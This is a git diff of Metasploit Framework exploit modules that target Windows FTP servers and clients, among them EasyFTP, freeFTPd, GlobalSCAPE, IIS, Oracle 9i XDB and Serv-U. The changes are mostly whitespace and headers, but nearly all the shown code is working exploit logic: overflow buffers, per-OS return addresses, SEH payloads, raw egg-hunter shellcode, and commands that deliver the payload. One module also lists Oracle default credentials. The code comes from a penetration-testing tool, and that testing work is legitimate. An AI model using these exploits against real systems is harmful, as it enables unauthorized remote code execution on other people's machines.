1.7.0.11 CWD Command Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 - and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which + and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index 64edf00cef..6ce525be7d 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -7,11 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'FileCopa FTP Server pre 18 Jul Version', 'Description' => %q{ - This module exploits the buffer overflow found in the LIST command - in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch + This module exploits the buffer overflow found in the LIST command + in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch }, 'Author' => [ 'Jacopo Cervini' ], 'License' => MSF_LICENSE, @@ -31,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2k Server SP4 English', { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp [ 'Windows XP Pro SP2 Italian', { 'Ret' => 0x77f62740, 'Nops' => 240 } ] # jmp esp @@ -40,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) end - + def exploit connect_login @@ -48,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "A " sploit << make_nops(target['Nops']) - sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded + sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded send_cmd( ['LIST', sploit] , false) diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index a4cc33205e..405ff00406 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,13 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'freeFTPd 1.0 Username Overflow', 'Description' => %q{ - This module exploits a stack overflow in the freeFTPd + This module exploits a stack overflow in the freeFTPd multi-protocol file transfer service. This flaw can only be exploited when logging has been enabled (non-default). - }, 'Author' => 'MC', 'License' => MSF_LICENSE, @@ -37,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '20909'], [ 'BID', '15457'], [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'], - ], 'Privileged' => false, 'Payload' => @@ -46,55 +42,55 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'Windows 2000 English ALL', { 'Platform' => 'win', 'Ret' => 0x75022ac4, }, ], - [ + [ 'Windows XP Pro SP0/SP1 English', { 'Platform' => 'win', 'Ret' => 0x71aa32ad, }, ], - [ + [ 'Windows NT SP5/SP6a English', { 'Platform' => 'win', 'Ret' => 0x776a1799, }, ], - [ + [ 'Windows 2003 Server English', { 'Platform' => 'win', 'Ret' => 0x7ffc0638, }, - ], + ], ])) end def check connect - disconnect + disconnect if (banner =~ /freeFTPd 1\.0/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect print_status("Trying target #{target.name}...") buf = rand_text_english(1816, payload_badchars) - seh = generate_seh_payload(target.ret) + seh = generate_seh_payload(target.ret) buf[1008, seh.length] = seh send_cmd( ['USER', buf] , false) diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 7d074fd3d3..1daa4db35d 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'GlobalSCAPE Secure FTP Server Input Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. + This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account ( - or anonymous access) is required for this exploit to work. + or anonymous access) is required for this exploit to work. }, 'Author' => [ 'Fairuzan Roslan ', 'Mati Aharoni ' ], 'License' => BSD_LICENSE, @@ -46,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", }, - 'Targets' => + 'Targets' => [ [ 'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal', @@ -66,9 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote buf = make_nops(3047) buf[2043, 4] = [ target.ret ].pack('V') buf[2047, payload.encoded.length] = payload.encoded - + send_cmd( [buf] ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index a2575f0580..c27f44dc71 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -111,7 +111,7 @@ To find a target: 4. follow the xref to the imports area 5. copy/paste the address 6. the 'Writable' value should be anything after the last address IDA shows.. - (preferably something above 0x0d, to avoid bad chars) + (preferably something above 0x0d, to avoid bad chars) If crashes occur referencing strange values, 'NumPops' probably needs adjusting. For now, that will have to be done manually. @@ -140,7 +140,7 @@ For now, that will have to be done manually. def exploit - # Use a copy of the target + # Use a copy of the target mytarget = target if (target['auto']) diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index 8b85738585..9f9ff4b70a 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,15 +19,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 + This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 client that is triggered through an excessively long PASV reply command. This module was ported from the original exploit by drG4njubas with minor improvements. }, 'Author' => [ 'Patrick Webster ' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2003-0558' ], [ 'OSVDB', '4587' ], [ 'BID', '7860' ], @@ -48,66 +46,66 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK. - [ 'Universal LeapFTP.exe', { 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe + # Patrick - Tested against w2k sp0, sp4, xp sp0, xp sp2 en OK. + [ 'Universal LeapFTP.exe', { 'Ret' => 0x004bdd24 } ], # p/p/r LeapFTP.exe [ 'Windows 2000 SP0/4 English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - [ 'Windows XP SP0 English', { 'Ret' => 0x7660139c } ], # p/p/r cscdll.dll + [ 'Windows XP SP0 English', { 'Ret' => 0x7660139c } ], # p/p/r cscdll.dll ], 'Privileged' => false, 'DisclosureDate' => 'Jun 09 2003', 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]), OptString.new('SRVNAME', [ true, "Welcome to the ... FTP Service", "Test" ]), ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) buffer = "220 Welcome to the " + datastore['SRVNAME'] + " FTP Service.\r\n" client.put(buffer) end - + def on_client_data(client) - - + + client.get_once - + # This could be improved if anyone wants to write a FTP server API. user = "331 Please specify the password.\r\n" client.put(user) - + client.get_once pass = "230 Login successful.\r\n" client.put(pass) - + client.get_once syst = "215 Windows_NT 5.1\r\n" client.put(syst) - + client.get_once rest = "350 Restart position accepted (100).\r\n" client.put(rest) - + client.get_once rest = "350 Restart position accepted (0).\r\n" client.put(rest) - + client.get_once pwd = "257 \"/\"\r\n" client.put(pwd) - + client.get_once type = "200 Switching to ASCII mode.\r\n" client.put(type) - + client.get_once port = "500 Illegal PORT command.\r\n" # We force LeapFTP to use PASV. It will try PORT first. client.put(port) - + client.get_once pasv = "227 Entering Passive Mode (" pasv << rand_text_numeric(1053) + generate_seh_payload(target.ret) @@ -117,9 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote pasv << "," + rand_text_numeric(1) pasv << "," + rand_text_numeric(1) pasv << ")\r\n" - + client.put(pasv) - + handler(client) service.close_client(client) end diff --git a/modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb b/modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb index f79df56b19..f9064e34fa 100644 --- a/modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/microsoft_ftpd_nlst.rb @@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::Ftp - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS FTP Server NLST Response Overflow', 'Description' => %q{ - This module exploits a stack overflow flaw in the Microsoft IIS FTP - service. The flaw is triggered when a special NLST argument is passed - while the session has changed into a long directory path. For this exploit - to work, the FTP server must be configured to allow write access to the - file system (either anonymously or in conjunction with a real account) - + This module exploits a stack overflow flaw in the Microsoft IIS FTP + service. The flaw is triggered when a special NLST argument is passed + while the session has changed into a long directory path. For this exploit + to work, the FTP server must be configured to allow write access to the + file system (either anonymously or in conjunction with a real account) }, 'Author' => [ 'Kingcope ', 'hdm' ], 'License' => MSF_LICENSE, @@ -52,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Targets' => - [ + [ [ 'Windows 2000 SP4 English/Italian (IIS 5.0)', { @@ -91,51 +88,51 @@ class Metasploit3 < Msf::Exploit::Remote based = rand_text_alpha_upper(10) - - res = send_cmd( ['MKD', based ], true ) + + res = send_cmd( ['MKD', based ], true ) print_status(res.strip) - + if (res !~ /directory created/) print_error("The root directory of the FTP server is not writeable") disconnect return end - + res = send_cmd( ['CWD', based ], true ) print_status(res.strip) - + egg = rand_text_alpha_upper(4) hun = "\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38#{egg}\x75\xF7\x40\x40\x40\x40\xFF\xE0" - + # This egg hunter is necessary because of the huge set of restricted characters for directory names # The best that metasploit could so was 133 bytes for an alphanum encoded egg hunter # The egg hunter above was written by kcope and searches from 0x70000 forward (stack) in order # to locate the real shellcode. The only change from the original hunter was to randomize the # prefix used. - + # Store our real shellcode on the stack 1.upto(5) do res = send_cmd( ['SITE', egg + payload.encoded.gsub("\xff", "\xff\xff") ], true ) end - + # Create the directory path that will be used in the overflow - pre = rand_text_alpha_upper(3) # esp+0x28 points here + pre = rand_text_alpha_upper(3) # esp+0x28 points here pst = rand_text_alpha_upper(210) # limited by max path pst[ 0, hun.length] = hun # egg hunter - pst[ 90, 4] = [target['Patch']].pack('V') # patch smashed pointers + pst[ 90, 4] = [target['Patch']].pack('V') # patch smashed pointers pst[ 94, 4] = [target['Patch']].pack('V') # patch smashed pointers pst[140, 32] = [target['Patch']].pack('V') * 8 # patch smashed pointers pst[158, 4] = [target.ret].pack("V") # return pst[182, 5] = "\xe9" + [-410].pack("V") # jmp back - + # Escape each 0xff with another 0xff for FTP pst = pst.gsub("\xff", "\xff\xff") - + print_status("Creating long directory...") - res = send_cmd( ['MKD', pre+pst ], true ) + res = send_cmd( ['MKD', pre+pst ], true ) print_status(res.strip) - + srv = Rex::Socket::TcpServer.create( 'LocalHost' => '0.0.0.0', 'LocalPort' => 0, @@ -145,30 +142,30 @@ class Metasploit3 < Msf::Exploit::Remote 'MsfExploit' => self, } ) - + begin - + thr = Thread.new { srv.accept } - + prt = srv.getsockname[2] prt1 = prt / 256 prt2 = prt % 256 addr = Rex::Socket.source_address(rhost).gsub(".", ",") + ",#{prt1},#{prt2}" - res = send_cmd( ['PORT', addr ], true ) + res = send_cmd( ['PORT', addr ], true ) print_status(res.strip) - print_status("Trying target #{target.name}...") + print_status("Trying target #{target.name}...") - res = send_cmd( ['NLST', pre+pst + "*/../" + pre + "*/"], true ) + res = send_cmd( ['NLST', pre+pst + "*/../" + pre + "*/"], true ) print_status(res.strip) if res sleep(2) - + handler disconnect - + ensure thr.kill srv.close diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index 7bbed07631..eb5054a7f8 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NetTerm NetFTPD USER Buffer Overflow', 'Description' => %q{ - This module exploits a vulnerability in the NetTerm NetFTPD + This module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. - This module uses the USER command to trigger the overflow. + This module uses the USER command to trigger the overflow. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -35,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '15865'], [ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'], [ 'BID', '13396'], - ], 'Privileged' => false, 'Payload' => @@ -43,46 +40,44 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1000, 'BadChars' => "\x00\x0a\x20\x0d", 'StackAdjustment' => -3500, - }, - - 'Targets' => + 'Targets' => [ - [ + [ 'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005 { 'Platform' => 'win', 'Ret' => 0x0040df98, # netftpd.exe (multiple versions) }, ], - [ + [ 'Windows 2000 English', { 'Platform' => 'win', 'Ret' => 0x75022ac4, # ws2help.dll }, ], - [ + [ 'Windows XP English SP0/SP1', { 'Platform' => 'win', 'Ret' => 0x71aa32ad, # ws2help.dll }, ], - [ + [ 'Windows 2003 English', { 'Platform' => 'win', 'Ret' => 0x7ffc0638, # peb magic :-) }, ], - [ + [ 'Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Ret' => 0x77681799, # ws2help.dll }, - ], + ], ], 'DisclosureDate' => 'Apr 26 2005', 'DefaultTarget' => 0)) @@ -90,16 +85,16 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - disconnect + disconnect if (banner =~ /NetTerm FTP server/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end def exploit connect - + print_status("Trying target #{target.name}...") # U push ebp @@ -112,10 +107,10 @@ class Metasploit3 < Msf::Exploit::Remote buf[0, 1] = "\xc0" buf[1, payload.encoded.length] = payload.encoded buf[1014, 4] = [ target.ret ].pack('V') - + send_cmd( ["USER #{buf}"] ) send_cmd( ['HELP'] ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index bd72c8ef64..ba48efabe2 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -3,32 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)', 'Description' => %q{ - By passing an overly long string to the PASS command, a + By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference. - }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -49,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 800, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Targets' => [ @@ -64,18 +61,17 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Aug 18 2003', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(2100),], self.class) - deregister_options('FTPUSER', 'FTPPASS') - + register_options([Opt::RPORT(2100),], self.class) + deregister_options('FTPUSER', 'FTPPASS') end - + def check connect - disconnect + disconnect if (banner =~ /9\.2\.0\.1\.0/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end @@ -83,14 +79,14 @@ class Metasploit3 < Msf::Exploit::Remote connect user = rand_text_alpha_upper(10) - sploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6) + sploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6) sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded - - print_status("Trying target #{target.name}...") - + + print_status("Trying target #{target.name}...") + send_cmd( ['USER', user], true ) send_cmd( ['PASS', sploit], false ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index db18db6bed..9ef31b055f 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)', 'Description' => %q{ - By passing an overly long token to the UNLOCK command, a + By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit @@ -31,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsmp, scott:tiger, system:manager, and sys:change_on_install. - }, 'Author' => [ 'MC', 'David Litchfield ' ], 'License' => MSF_LICENSE, @@ -42,60 +39,58 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '2449'], [ 'BID', '8375'], [ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], - ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Privileged' => true, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ - [ + [ 'Oracle 9.2.0.1 Universal', { 'Platform' => 'win', - 'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret) + 'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret) }, ], ], 'DisclosureDate' => 'Aug 18 2003', 'DefaultTarget' => 0)) - register_options( [ - Opt::RPORT(2100), - OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']), - OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']), - ], self.class ) + register_options([ + Opt::RPORT(2100), + OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']), + OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']), + ], self.class ) end def check connect - disconnect + disconnect if (banner =~ /9\.2\.0\.1\.0/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end def exploit connect_login - + print_status("Trying target #{target.name}...") buf = rand_text_english(1130, payload_badchars) - seh = generate_seh_payload(target.ret) + seh = generate_seh_payload(target.ret) buf[322, seh.length] = seh send_cmd( ['UNLOCK', '/', buf] , false ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index f94db24be3..52cf3c50e3 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb @@ -1,11 +1,14 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -15,13 +18,13 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'ProFTP 2.9 Banner Remote Buffer Overflow Exploit', 'Description' => %q{ - This module exploits a buffer overflow in the ProFTP 2.9 + This module exploits a buffer overflow in the ProFTP 2.9 client that is triggered through an excessively long welcome message. }, 'Author' => [ 'His0k4 ' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-3976' ], [ 'OSVDB', '57394' ], @@ -38,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Tested against - XP SP3 English OK. [ 'Universal', { 'Ret' => 0x6809d408 } ], # WCMDPA10 (part of ProFTP) @@ -47,13 +50,13 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]), ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) buffer = "220 " buffer << rand_text_numeric(2064) @@ -63,5 +66,5 @@ class Metasploit3 < Msf::Exploit::Remote buffer << "\r\n" client.put(buffer) end - + end diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 64047408b7..c485ed3bf2 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -19,10 +19,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'KarjaSoft Sami FTP Server v2.02 USER Overflow', 'Description' => %q{ - This module exploits the KarjaSoft Sami FTP Server version 2.02 + This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + }, 'Platform' => ['win'], 'Privileged' => false, 'Payload' => @@ -62,15 +62,15 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Targets' => - [ - [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll - [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll - [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll - ], + [ + [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll + [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll + [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll + [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll + ], 'DisclosureDate' => 'Jan 24 2006')) - register_options( + register_options( [ Opt::RPORT(21), ], self.class) diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index ff0f6a76b8..6a20621105 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -17,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Sasser Worm avserve FTP PORT Buffer Overflow', 'Description' => %q{ - This module exploits the FTP server component of the Sasser worm. + This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten. }, 'Author' => [ 'valsmith [at] metasploit.com>', 'chamuco [at] gmail.com>', 'patrick' ], @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'May 10 2004', 'DefaultTarget' => 1)) - register_options( + register_options( [ Opt::RPORT(5554), ], self.class) diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 65849876db..148f7f1102 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -20,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Egghunter def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Serv-U FTPD MDTM Overflow', 'Description' => %q{ - This is an exploit for the Serv-U's MDTM command timezone + This is an exploit for the Serv-U\'s MDTM command timezone overflow. It has been heavily tested against versions 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against nt4/2k/xp/2k3. I have also had success against version 3, @@ -34,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote This exploit is a single hit, the service dies after the shellcode finishes execution. - }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, @@ -47,7 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote 